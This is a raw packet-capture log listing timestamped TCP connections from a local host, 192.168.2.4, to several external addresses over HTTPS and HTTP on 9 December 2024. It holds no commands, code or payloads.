                                                  Dec 9, 2024 09:34:48.021354914 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.035737038 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.035746098 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.035804033 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.067699909 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.114070892 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.116641998 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.116715908 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.116723061 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.116856098 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.116916895 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.122499943 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.122561932 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.126310110 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.126317024 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.126378059 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.126384020 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.135909081 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.135936022 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.135978937 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.135982990 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.136027098 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.136971951 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.137032986 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.143974066 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.144043922 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.144978046 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.144984961 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.145049095 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.149015903 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.149082899 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.154032946 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.154038906 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.154119968 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.158899069 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.158965111 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.163023949 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.163029909 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.163089991 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.167675972 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.167681932 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.167735100 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.168194056 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.168251991 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.172787905 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.172851086 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.172858000 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.172938108 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.173098087 CET44349761104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.173151970 CET49761443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.176826000 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.176837921 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.176903963 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.185992956 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.186054945 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.194781065 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.194839001 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.199363947 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.199436903 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.208364010 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.208439112 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.212970018 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.213030100 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.300865889 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.301038980 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.304222107 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.304286003 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.311599970 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.311675072 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.313246012 CET44349765172.67.139.29192.168.2.4
                                                  Dec 9, 2024 09:34:48.313467979 CET49765443192.168.2.4172.67.139.29
                                                  Dec 9, 2024 09:34:48.313478947 CET44349765172.67.139.29192.168.2.4
                                                  Dec 9, 2024 09:34:48.313821077 CET44349765172.67.139.29192.168.2.4
                                                  Dec 9, 2024 09:34:48.314121008 CET49765443192.168.2.4172.67.139.29
                                                  Dec 9, 2024 09:34:48.314181089 CET44349765172.67.139.29192.168.2.4
                                                  Dec 9, 2024 09:34:48.314259052 CET49765443192.168.2.4172.67.139.29
                                                  Dec 9, 2024 09:34:48.318571091 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.318643093 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.322094917 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.322158098 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.328569889 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.328634024 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.335030079 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.335092068 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.338258982 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.338325977 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.344142914 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.344202995 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.350096941 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.350151062 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.353039026 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.353094101 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.353099108 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.353107929 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.353149891 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.353260994 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.353274107 CET44349763104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.353281021 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.353326082 CET49763443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.355336905 CET44349765172.67.139.29192.168.2.4
                                                  Dec 9, 2024 09:34:48.355859041 CET49766443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.355885983 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.355950117 CET49766443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.356137991 CET49766443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:48.356153965 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.556416988 CET49767443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.556457043 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.556523085 CET49767443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.556749105 CET49767443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:48.556761980 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:48.686588049 CET804973993.188.41.36192.168.2.4
                                                  Dec 9, 2024 09:34:48.686644077 CET4973980192.168.2.493.188.41.36
                                                  Dec 9, 2024 09:34:48.967154026 CET44349765172.67.139.29192.168.2.4
                                                  Dec 9, 2024 09:34:48.967227936 CET44349765172.67.139.29192.168.2.4
                                                  Dec 9, 2024 09:34:48.967286110 CET49765443192.168.2.4172.67.139.29
                                                  Dec 9, 2024 09:34:48.968111992 CET4973980192.168.2.493.188.41.36
                                                  Dec 9, 2024 09:34:48.969012022 CET49765443192.168.2.4172.67.139.29
                                                  Dec 9, 2024 09:34:48.969031096 CET44349765172.67.139.29192.168.2.4
                                                  Dec 9, 2024 09:34:49.087388992 CET804973993.188.41.36192.168.2.4
                                                  Dec 9, 2024 09:34:49.106235027 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:49.106256962 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:49.106318951 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:49.106555939 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:49.106571913 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:49.564953089 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:49.565366983 CET49766443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:49.565391064 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:49.565676928 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:49.566086054 CET49766443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:49.566225052 CET49766443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:49.566230059 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:49.566274881 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:49.611641884 CET49766443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:49.763753891 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:49.764091969 CET49767443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:49.764116049 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:49.764394999 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:49.764853954 CET49767443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:49.764898062 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:49.765043020 CET49767443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:49.811331987 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.006483078 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.006541967 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.006598949 CET49766443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:50.008096933 CET49766443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:50.008128881 CET44349766104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.203907013 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.203979015 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.204025030 CET49767443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:50.204032898 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.204081059 CET49767443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:50.206322908 CET49767443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:50.206342936 CET44349767104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.322516918 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:50.322849035 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.322879076 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:50.323936939 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:50.324006081 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.325023890 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.325090885 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:50.325202942 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.325211048 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:50.372404099 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.623001099 CET49769443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:50.623028040 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.623112917 CET49769443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:50.623343945 CET49769443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:50.623354912 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:50.779019117 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:50.779079914 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:50.779366970 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.779407978 CET4434976835.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:50.779419899 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.780397892 CET49770443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.780431986 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:50.780441999 CET49768443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.780498981 CET49770443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.780706882 CET49770443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:50.780720949 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:51.833148956 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:51.833442926 CET49769443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:51.833456039 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:51.833734989 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:51.834037066 CET49769443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:51.834089041 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:51.834168911 CET49769443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:51.875328064 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:51.989670038 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:51.989916086 CET49770443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:51.989947081 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:51.990235090 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:51.990528107 CET49770443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:51.990582943 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:51.990639925 CET49770443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:52.031342030 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:52.274362087 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:52.274415970 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:52.274478912 CET49769443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:52.275058031 CET49769443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:52.275068045 CET44349769104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:52.278012991 CET49771443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:52.278036118 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:52.278116941 CET49771443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:52.278291941 CET49771443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:52.278306961 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:52.449578047 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:52.449676037 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:52.449762106 CET49770443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:52.450098991 CET49770443192.168.2.435.190.80.1
                                                  Dec 9, 2024 09:34:52.450128078 CET4434977035.190.80.1192.168.2.4
                                                  Dec 9, 2024 09:34:52.533180952 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:52.533235073 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:52.533315897 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:52.533580065 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:52.533596039 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.485610962 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.487128973 CET49771443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:53.487154961 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.487458944 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.487838984 CET49771443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:53.487894058 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.488054037 CET49771443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:53.531326056 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.741908073 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.742151976 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:53.742173910 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.742458105 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.742739916 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:53.742795944 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.742865086 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:53.742938042 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:53.742969990 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.743067026 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:53.743100882 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.925282001 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.925345898 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:53.926587105 CET49771443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:53.927007914 CET49771443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:53.927026987 CET44349771104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.342792034 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.343122005 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.343154907 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.343184948 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.343214035 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.343236923 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.343246937 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.343924046 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.343978882 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.343986988 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.351279974 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.354721069 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.354727983 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.367631912 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.370703936 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.370712042 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.429100037 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.462111950 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.514575958 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.514586926 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.538464069 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.539130926 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.539139032 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.548008919 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.548166990 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.548259020 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.548268080 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.550858021 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.556010962 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.556107998 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.556173086 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.556180000 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.556199074 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.556246042 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.620410919 CET49772443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:34:54.620430946 CET44349772104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.765315056 CET49773443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:54.765341043 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:54.765410900 CET49773443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:54.766130924 CET49773443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:54.766140938 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:55.977262020 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:55.977565050 CET49773443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:55.977587938 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:55.977873087 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:55.978179932 CET49773443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:55.978238106 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:55.978317022 CET49773443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:56.023332119 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:56.420358896 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:56.420419931 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:34:56.420485973 CET49773443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:56.421247959 CET49773443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:34:56.421266079 CET44349773104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:04.400599003 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:04.400633097 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:04.400798082 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:04.401043892 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:04.401058912 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:05.611120939 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:05.611469984 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:05.611498117 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:05.611793041 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:05.612334967 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:05.612390995 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:05.612581015 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:05.612660885 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:05.612695932 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:05.612791061 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:05.612812042 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:05.612823963 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:06.308242083 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:06.308634043 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:06.308667898 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:06.308698893 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:06.308715105 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:06.308746099 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:06.308765888 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:06.308821917 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:06.309427977 CET49774443192.168.2.4104.18.94.41
                                                  Dec 9, 2024 09:35:06.309447050 CET44349774104.18.94.41192.168.2.4
                                                  Dec 9, 2024 09:35:06.317943096 CET49775443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:35:06.317981005 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:06.318052053 CET49775443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:35:06.318295956 CET49775443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:35:06.318312883 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:06.711486101 CET49776443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:06.711514950 CET44349776172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:06.711591005 CET49776443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:06.711872101 CET49776443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:06.711883068 CET44349776172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:07.526729107 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:07.527128935 CET49775443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:35:07.527159929 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:07.527456045 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:07.527884007 CET49775443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:35:07.527940989 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:07.528036118 CET49775443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:35:07.575330019 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:07.935868025 CET44349776172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:07.936135054 CET49776443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:07.936156034 CET44349776172.67.139.11192.168.2.4
